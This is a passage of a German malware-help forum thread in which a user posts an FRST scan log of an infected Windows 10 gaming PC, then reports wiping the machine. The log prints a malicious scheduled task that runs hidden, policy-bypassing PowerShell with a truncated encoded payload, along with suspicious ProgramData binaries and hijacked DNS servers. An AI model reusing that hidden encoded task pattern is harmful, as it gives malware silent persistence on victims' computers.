Task: {6F8FE15D-ECB7-4B7F-A441-970E64454342} - System32\Tasks\Lenovo\SHPrompt => C:\Program Files (x86)\Lenovo\SHAREit\ShareitPrompt.exe [2015-07-12] ()
Task: {70487673-3B81-430E-96DB-4E1D1B379EC0} - System32\Tasks\{C4C9229A-7718-19E9-E87C-95ACDBD82D29} => C:\WINDOWS\system32\WindowsPowershell\v1.0\powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand OwA7ADsAOwA7ADsAOwAgACAAIAAgADsAOwAgACAAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUA (Der Dateneintrag hat 7912 mehr Zeichen).
Task: {820BE53B-5026-45BB-977F-B8C7053E4B76} - System32\Tasks\Intel PTT EK Recertification => C:\Program Files\Intel\iCLS Client\IntelPTTEKRecertification.exe [2016-07-26] (Intel(R) Corporation)
Task: {841E2C31-9F96-4695-85CD-649BD6A70ABD} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.17123-0\MpCmdRun.exe [2017-12-07] (Microsoft Corporation)
Task: {8E2751BC-99D3-4F51-BE5D-8D7B18E629EB} - System32\Tasks\{5DAD0AF4-5664-40A1-87CB-C59273ED4038} => "c:\program files (x86)\mozilla firefox\firefox.exe" hxxp://www.skype.com/go/downloading?source=lightinstaller&ver=7.1.0.105&LastError=404
Task: {93A31635-9D43-4C4B-9363-F79A807934E7} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.17123-0\MpCmdRun.exe [2017-12-07] (Microsoft Corporation)
Task: {9E8873C7-04AF-429B-B0FA-166F3E0AB6F3} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\9657b3c2-dd0e-4229-8bac-dbb06b3934e1 => C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [2017-11-12] (Lenovo Group Limited)
Task: {9FE447EE-BA95-457F-B6D7-916C676C8E61} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.17123-0\MpCmdRun.exe [2017-12-07] (Microsoft Corporation)
Task: {A2C2CC7C-278F-433F-A98D-224F749087EA} - System32\Tasks\Lenovo\LSC\Lenovo Solution Center Notifications => C:\Program Files\Lenovo\Lenovo Solution Center\LSCNotify.exe [2015-07-01] (Lenovo)
Task: {AD0FBE96-6E1A-4B0D-AC6B-09F8DC034CC8} - System32\Tasks\Lenovo\Experience Improvement => C:\Program Files\Lenovo\ExperienceImprovement\LenovoExperienceImprovement.exe [2015-12-13] (Lenovo)
Task: {B4A9FCF9-E10A-4BA8-BB17-1F820E10C261} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 35 => C:\Program Files (x86)\Lenovo\Customer Feedback Program 35\Lenovo.TVT.CustomerFeedback.Agent35.exe [2015-07-01] (Lenovo)
Task: {B652172A-72A9-44D9-A356-CEE1BFEEB573} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.17123-0\MpCmdRun.exe [2017-12-07] (Microsoft Corporation)
Task: {B73603D9-359F-49B9-B85D-E1274C8E03DE} - System32\Tasks\Lenovo\QuickOptimizer => C:\Program Files\lenovo\QuickOptimizer\QuickOptimizerIcon.exe [2015-08-13] (Lenovo)
Task: {C87577EC-3B3A-44CF-A59B-DDAFE0FDB32D} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\a225f4b1-83cd-473e-8fae-c7ef7fedbca9 => C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [2017-11-12] (Lenovo Group Limited)
Task: {DE05F137-ABF9-4777-B7C2-0282013F5149} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-12-12] (Microsoft Corporation)
Task: {E2C3A000-70E7-46A9-BE71-FCEF8A6A2959} - System32\Tasks\DolbySelectorTask => C:\Program Files\Dolby Digital Plus\ddp.exe [2014-09-26] (Dolby Laboratories Inc.)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)


==================== Verknüpfungen & WMI ========================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)


==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2017-09-29 14:41 - 2017-09-29 14:41 - 000184432 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2017-10-18 23:51 - 2017-10-18 23:51 - 000092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2017-10-18 23:51 - 2017-10-18 23:51 - 001356088 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2016-10-05 12:15 - 2016-10-05 12:15 - 000107752 _____ () C:\Program Files\Intel\Intel(R) Online Connect Access\libglog.dll
2016-10-05 12:15 - 2016-10-05 12:15 - 000412904 _____ () C:\Program Files\Intel\Intel(R) Online Connect Access\JsonCpp.dll
2015-10-29 21:48 - 2011-08-16 20:46 - 000032768 _____ () C:\Windows\jmesoft\Service.exe
2015-10-29 21:08 - 2015-10-29 21:07 - 000024312 _____ () C:\Program Files (x86)\Lenovo\LenovoPortal\LenovoPortalService.exe
2015-05-19 09:11 - 2015-05-19 09:11 - 000007680 _____ () C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe
2016-09-25 00:20 - 2016-09-25 00:21 - 000189264 _____ () C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
2017-12-12 23:00 - 2017-11-26 13:23 - 011044864 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-12-12 23:00 - 2017-11-26 13:01 - 001804288 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-10-20 15:22 - 2017-10-20 15:22 - 000092472 _____ () C:\Program Files\iTunes\zlib1.dll
2017-10-20 15:22 - 2017-10-20 15:22 - 001356088 _____ () C:\Program Files\iTunes\libxml2.dll
2015-10-29 21:48 - 2011-08-16 20:46 - 000024576 _____ () C:\Windows\jmesoft\JME_LOAD.exe
2015-08-13 21:26 - 2015-08-13 21:26 - 000016288 _____ () C:\Program Files\lenovo\QuickOptimizer\ShowTaskbarIcon.dll
2015-08-13 21:26 - 2015-08-13 21:26 - 005067168 _____ () C:\Program Files\lenovo\QuickOptimizer\DTPrismAssistInf.dll
2018-01-03 22:50 - 2018-01-03 22:50 - 000086528 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.13.257.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2018-01-03 22:50 - 2018-01-03 22:50 - 000195072 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.13.257.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2018-01-03 22:50 - 2018-01-03 22:50 - 024670720 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.13.257.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2018-01-03 22:50 - 2018-01-03 22:50 - 002550272 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.13.257.0_x64__kzf8qxf38zg5c\skypert.dll
2018-01-03 22:50 - 2018-01-03 22:50 - 000667648 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.13.257.0_x64__kzf8qxf38zg5c\RtmMvrUap.dll
2016-10-04 17:09 - 2016-10-04 17:09 - 000253664 _____ () C:\Program Files\Intel\Intel(R) Online Connect\CSLibWrapper.dll
2017-12-05 21:58 - 2017-12-05 21:58 - 000102088 _____ () C:\Users\Gaming\AppData\Local\Microsoft\OneDrive\17.3.7131.1115\UpdateRingSettings.dll
2009-12-04 16:59 - 2009-12-04 16:59 - 000619816 _____ () C:\Program Files (x86)\Lenovo\Power2Go\CLMediaLibrary.dll
2009-12-04 17:04 - 2009-12-04 17:04 - 000013096 _____ () C:\Program Files (x86)\Lenovo\Power2Go\CLMLSvcPS.dll
2015-10-29 21:48 - 2011-05-17 13:27 - 000028672 _____ () C:\Windows\jmesoft\hidhook.dll
2016-10-20 01:28 - 2016-10-20 01:28 - 001243936 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
2018-01-03 22:52 - 2018-01-03 23:03 - 001321472 _____ () C:\ProgramData\987623d8\f75b5544.dll
2018-01-03 19:28 - 2018-01-03 19:28 - 000911872 _____ () C:\ProgramData\d7031301-0231-0\d7031301-0231-0.d
2018-01-03 23:03 - 2018-01-03 23:03 - 001790976 _____ () C:\ProgramData\{49AA240D-FE01-93A6-8F15-C88DF2D48BAE}\2DBF930F-9A14-24A4-1322-454EE11FAC79.exe

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\WINDOWS\system32\Drivers\rrclrsvb.sys:changelist [266]
AlternateDataStreams: C:\WINDOWS\system32\Drivers\urygctpi.sys:changelist [1306]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

IE trusted site: HKU\S-1-5-21-2799811712-2181285835-3472818555-1001\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-2799811712-2181285835-3472818555-1001\...\webcompanion.com -> hxxp://webcompanion.com

==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2015-07-10 12:04 - 2018-01-03 23:03 - 000001536 _____ C:\WINDOWS\system32\Drivers\etc\hosts

0.0.0.0 csgob0t.online

==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-2799811712-2181285835-3472818555-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Gaming\AppData\Roaming\Mozilla\Firefox\Desktop-Hintergrund.bmp
DNS Servers: 82.163.143.176 - 82.163.142.178
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

HKLM\...\StartupApproved\Run: => "WindowsDefender"
HKLM\...\StartupApproved\Run32: => "Razer Synapse"
HKU\S-1-5-21-2799811712-2181285835-3472818555-1001\...\StartupApproved\Run: => "Discord"
HKU\S-1-5-21-2799811712-2181285835-3472818555-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-2799811712-2181285835-3472818555-1001\...\StartupApproved\Run: => "Web Companion"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{388FDB18-F891-4342-83A9-BDE52DB1479F}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{8F6F66AC-5235-4999-9E93-634D5FC2F133}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{EA1D5952-80AA-43A4-A437-5B7F82807FD6}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{27CF56D2-A7A8-416B-B039-8E8B275B23BB}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{2B5808DC-23AE-463B-9ABE-3B743BA8BC9D}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [UDP Query User{63ADDCAF-48D2-44E8-AA22-7B925EC04CA2}C:\games\rf4_de\rf4launcher.exe] => (Allow) C:\games\rf4_de\rf4launcher.exe
FirewallRules: [TCP Query User{99D84F29-3728-4308-9766-1D3A0329F1FD}C:\games\rf4_de\rf4launcher.exe] => (Allow) C:\games\rf4_de\rf4launcher.exe
FirewallRules: [{D7F8802B-F348-4D3D-B611-8BDB08F7F38D}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{1665067C-8788-4786-8CFB-AFE7EF51C8DC}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{A1414ECE-D99C-46AC-B5A5-2031BCA4D18A}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{A8E49078-2A2C-49A5-A074-45FC9FC4392B}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{30EEB3EA-5E0D-438D-B779-225AE8921280}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Fishing Planet\FishingPlanet.exe
FirewallRules: [{86E9C7DE-DB0B-4094-A8F2-F8CBED221CA9}] => (Allow) D:\Program Files (x86)\Steam\steamapps\common\Fishing Planet\FishingPlanet.exe
FirewallRules: [{C7E4A42E-90F0-42CB-89E5-F988FF7B5BF8}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Call of Duty Modern Warfare 3\iw5sp.exe
FirewallRules: [{7682F64E-A6F3-4B42-BFDF-8D0B0AE8781B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Call of Duty Modern Warfare 3\iw5sp.exe
FirewallRules: [{6FAC5BDB-BCC8-48C6-80E2-3D419E58E2AD}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Call of Duty Modern Warfare 3\iw5mp.exe
FirewallRules: [{1160D7CE-8ABA-4B85-9FFE-6A28FB842026}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Call of Duty Modern Warfare 3\iw5mp.exe
FirewallRules: [{351B7164-9109-40FC-A3D2-56857ED52BC2}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{AF81A35A-3392-4685-B89B-E178D99AB62D}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{EC200E43-B8E8-4BB9-88D5-152C712AF9AB}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{0BD5489B-167D-413B-9EFE-197BB18DE156}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{A49ED4DD-7F0C-471F-A561-5276E8999D2D}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{814FB168-BD6F-4FE3-9DEB-465F2645A335}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{DE0CDDFB-39A2-41AF-BEC3-1A073692A950}] => (Allow) C:\Program Files (x86)\Lenovo\LenovoPortal\Lenovo.Portal.exe
FirewallRules: [{66201216-97D6-48F6-B9B3-F1F37AE9439E}] => (Allow) C:\Program Files (x86)\Lenovo\SHAREit\SHAREit.exe
FirewallRules: [{CE97A421-E3F2-4136-A2A0-704C71F4CDEA}] => (Allow) C:\Program Files (x86)\Lenovo\SHAREit\SHAREit.exe
FirewallRules: [{90894B65-BA96-43B8-AC17-92F93AD26956}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{0CC82FEB-96EE-43EC-AB87-5679A8EDBAE2}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{25B6E72C-977A-4005-89B8-5594FC225F7E}C:\program files (x86)\battle.net\battle.net.8539\battle.net.exe] => (Block) C:\program files (x86)\battle.net\battle.net.8539\battle.net.exe
FirewallRules: [UDP Query User{20097340-7841-4691-B75F-EF26B570A4B4}C:\program files (x86)\battle.net\battle.net.8539\battle.net.exe] => (Block) C:\program files (x86)\battle.net\battle.net.8539\battle.net.exe
FirewallRules: [TCP Query User{4D943733-5EA1-43BF-B2D5-A9C17BDF2653}C:\program files (x86)\battle.net\battle.net.8657\battle.net.exe] => (Allow) C:\program files (x86)\battle.net\battle.net.8657\battle.net.exe
FirewallRules: [UDP Query User{C7F6CE93-A484-4117-B63F-B7910B3FC578}C:\program files (x86)\battle.net\battle.net.8657\battle.net.exe] => (Allow) C:\program files (x86)\battle.net\battle.net.8657\battle.net.exe
FirewallRules: [TCP Query User{00BA61E1-9DAB-49D6-A8AE-446B2EDC3F27}C:\program files (x86)\battle.net\battle.net.8733\battle.net.exe] => (Allow) C:\program files (x86)\battle.net\battle.net.8733\battle.net.exe
FirewallRules: [UDP Query User{B9DA4ADC-F4CA-42EF-ADD6-3921921084E6}C:\program files (x86)\battle.net\battle.net.8733\battle.net.exe] => (Allow) C:\program files (x86)\battle.net\battle.net.8733\battle.net.exe
FirewallRules: [{E10ABC7E-ED2D-4CF0-8C77-7903D36C2A00}] => (Allow) C:\WINDOWS\SysWOW64\TCPSVCS.EXE
FirewallRules: [{9C10A512-068C-4CC1-9A5E-0F197E5E6DB5}] => (Allow) C:\Program Files\jetstrmedia\NetMedia\desktop_media_service.exe
FirewallRules: [{A77749F9-B002-4F22-8756-AF6E1C8A23AC}] => (Allow) C:\Program Files\jetstrmedia\NetMedia\checker.exe

==================== Wiederherstellungspunkte =========================

ACHTUNG: Systemwiederherstellung ist deaktiviert

==================== Fehlerhafte Geräte im Gerätemanager =============


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (01/03/2018 10:42:00 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 1047

Error: (01/03/2018 10:42:00 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 1047

Error: (01/03/2018 10:42:00 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (01/03/2018 10:42:00 PM) (Source: IntelDalJhi) (EventID: 4) (User: )
Description: Intel(R) Dynamic Application Loader Host Interface Service initialization failure - the spooler applet is invalid.

Error: (01/03/2018 10:42:00 PM) (Source: IntelDalJhi) (EventID: 4) (User: )
Description: Intel(R) Dynamic Application Loader Host Interface Service initialization failure - the spooler applet is invalid.

Error: (01/03/2018 10:32:02 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: 176883e7-5d1.exe, Version: 0.0.0.0, Zeitstempel: 0x5a4c5d10
Name des fehlerhaften Moduls: ntdll.dll, Version: 10.0.16299.64, Zeitstempel: 0xac8afc81
Ausnahmecode: 0xc0000005
Fehleroffset: 0x000405d4
ID des fehlerhaften Prozesses: 0x2dac
Startzeit der fehlerhaften Anwendung: 0x01d384abecf0442c
Pfad der fehlerhaften Anwendung: C:\ProgramData\Skype\176883e7-5d1.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\SYSTEM32\ntdll.dll
Berichtskennung: 42fb9768-d020-45d9-89d2-6200bf235fd0
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (01/03/2018 10:31:45 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 39313

Error: (01/03/2018 10:31:45 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 39313

Error: (01/03/2018 10:31:45 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (01/03/2018 10:31:07 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 1000


Systemfehler:
=============
Error: (01/03/2018 11:02:58 PM) (Source: DCOM) (EventID: 10010) (User: BEASTYBABY)
Description: Der Server "{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (01/03/2018 10:58:05 PM) (Source: DCOM) (EventID: 10010) (User: NT-AUTORITÄT)
Description: Der Server "{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (01/03/2018 10:58:03 PM) (Source: DCOM) (EventID: 10010) (User: NT-AUTORITÄT)
Description: Der Server "{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (01/03/2018 10:55:29 PM) (Source: DCOM) (EventID: 10010) (User: NT-AUTORITÄT)
Description: Der Server "{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (01/03/2018 10:54:05 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT-AUTORITÄT)
Description: Fehler beim Lesen der Datei für lokale Hosts.

Error: (01/03/2018 10:50:13 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (01/03/2018 10:50:13 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (01/03/2018 10:50:05 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: Das System wurde zuvor am ‎03.‎01.‎2018 um 22:35:52 unerwartet heruntergefahren.

Error: (01/03/2018 10:43:29 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (01/03/2018 10:43:29 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.


CodeIntegrity:
===================================
  Date: 2018-01-03 23:02:26.882
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

  Date: 2018-01-03 23:02:26.872
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

  Date: 2018-01-03 23:01:28.323
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

  Date: 2018-01-03 23:01:28.318
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

  Date: 2018-01-03 23:01:19.418
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

  Date: 2018-01-03 23:01:19.350
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

  Date: 2018-01-03 23:01:17.023
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

  Date: 2018-01-03 23:01:17.022
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

  Date: 2018-01-03 23:01:12.720
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.

  Date: 2018-01-03 23:01:12.647
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz
Prozentuale Nutzung des RAM: 20%
Installierter physikalischer RAM: 16335.76 MB
Verfügbarer physikalischer RAM: 12982.95 MB
Summe virtueller Speicher: 18767.76 MB
Verfügbarer virtueller Speicher: 15121.4 MB

==================== Laufwerke ================================

Drive c: (Windows) (Fixed) (Total:110.43 GB) (Free:41.34 GB) NTFS ==>[System mit Startkomponenten (eingeholt von Laufwerk)]
Drive d: () (Fixed) (Total:1832.53 GB) (Free:1706.23 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (Size: 111.8 GB) (Disk ID: D92A23AC)

Partition: GPT.

========================================================
Disk: 1 (Size: 1863 GB) (Disk ID: D92A235B)

Partition: GPT.

==================== Ende von Addition.txt ============================
         
--- --- ---
__________________


Alt 06.01.2018, 13:49   #3
ViperGaming
 
cmd.exe spam nach hochfahren von Windows 10 - Standard

cmd.exe spam nach hochfahren von Windows 10



Hab den PC platt gemacht, da es immer akuter wurde und ich gegen Ende nichts mehr machen konnte.

Vielen Dank trotzdem
__________________

Antwort

Themen zu cmd.exe spam nach hochfahren von Windows 10
administrator, bonjour, cmd öffnet automatisch, defender, explorer, fehler, firefox, home, homepage, mozilla, mozilla pop ups, nvidia, programm, prozesse, realtek, registry, scan, security, software, spam, starten, svchost.exe, taskmanager, teamspeak, temp, windows, windows defender warning, winlogon.exe



Ähnliche Themen: cmd.exe spam nach hochfahren von Windows 10


  1. Windows 7: Laptop friert nach dem Hochfahren komplett ein
    Log-Analyse und Auswertung - 13.12.2015 (7)
  2. Windows 7: Nach Windows-Update schwarzer Bildschirm beim Hochfahren
    Plagegeister aller Art und deren Bekämpfung - 29.05.2015 (3)
  3. Windows 8 Schwarzer Bildschirm nach dem hochfahren
    Alles rund um Windows - 18.02.2015 (12)
  4. Windows Vista: Nach dem Hochfahren werde ich nach Erlaubnis gefragt ob sich dieses Programm öffnen darf: shuka\UACGetter.exe, ein Trojaner?
    Log-Analyse und Auswertung - 03.01.2015 (13)
  5. Windows: White Screen nach hochfahren des Computers
    Plagegeister aller Art und deren Bekämpfung - 24.03.2014 (22)
  6. Bluescreen nach hochfahren von Windows 7 - Kein Zugang zum Desktop!
    Log-Analyse und Auswertung - 13.03.2014 (7)
  7. weißer Bildschirm nach dem hochfahren von Windows 7
    Log-Analyse und Auswertung - 15.10.2013 (4)
